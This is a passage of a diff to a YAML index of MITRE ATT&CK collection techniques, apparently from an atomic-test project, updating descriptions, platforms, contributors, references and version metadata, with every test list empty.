           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39844,22 +40317,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39876,11 +40351,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39896,37 +40370,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39938,75 +40403,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -40033,7 +40516,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40057,13 +40540,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -40084,6 +40565,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -40107,8 +40589,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -40133,7 +40617,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -40200,12 +40683,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40239,10 +40721,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -40253,13 +40737,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40300,37 +40785,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40341,23 +40800,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40427,7 +40910,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40462,7 +40944,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40481,10 +40963,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40513,7 +41074,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40543,8 +41104,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40598,7 +41157,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40635,7 +41193,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40663,12 +41221,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40705,23 +41261,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40754,21 +41310,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40876,12 +41431,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40892,13 +41446,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40912,6 +41466,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40922,12 +41477,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40972,30 +41527,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
